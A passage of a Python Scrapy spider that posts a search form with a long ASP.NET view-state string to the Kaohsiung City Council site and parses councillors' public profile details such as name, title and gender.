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',
'ctl00$txtSearch':u'全文檢索',
'ctl00$hidSelectNode':u'1287/1293',
'ctl00$ContentPlaceHolder1$ddlPeriod':'7',
'ctl00$ContentPlaceHolder1$ddlPeriodTerms':'36',
'ctl00$ContentPlaceHolder1$txtName':u'姓名及關鍵字',
'ctl00$ContentPlaceHolder1$hidName':'',
'ctl00$ContentPlaceHolder1$btnSearch.x':'33',
'ctl00$ContentPlaceHolder1$btnSearch.y':'14'
}
return [FormRequest("http://www.kcc.gov.tw/PeriodMembers/Search.aspx", formdata=payload, callback=self.parse)]
def parse(self, response):
sel = Selector(response)
nodes = sel.xpath('//table/tr/td/span/a[contains(@href, "Introduction.aspx?KeyID")]')
for node in nodes:
yield Request('http://www.kcc.gov.tw/PeriodMembers/%s' % node.xpath('@href').extract()[0], callback=self.parse_profile)
def parse_profile(self, response):
sel = Selector(response)
item = Councilor()
item['election_year'] = '2010'
item['county'] = '高雄市'
image = sel.xpath('//div/img[@id="ContentPlaceHolder1_lv_Pic_0"]/@src').extract()[0]
item['image'] = urljoin(response.url, urllib.quote(image.encode('utf8')))
header = sel.xpath('//div[@class="info_data"]/table/tr/td/h4/text()').re(u'(.*?)(議員|副議長|議長)')
item['name'] = re.sub(u'\(.*\)', '', header[0])
item['title'] = header[1]
item['in_office'] = True
item['contact_details'] = []
item['links'] = [{'url': response.url, 'note': u'議會個人官網'}]
nodes = sel.xpath('//table/tr/td')
for node in nodes:
th = node.xpath('preceding-sibling::th[1]/text()').extract()
if th:
th = re.sub(u'[\s: ]', '', th[0])
else:
continue
if re.search(u'性別', th):
item['gender'] = node.xpath('text()').extract()[0]
if re.search(u'所屬政黨', th):
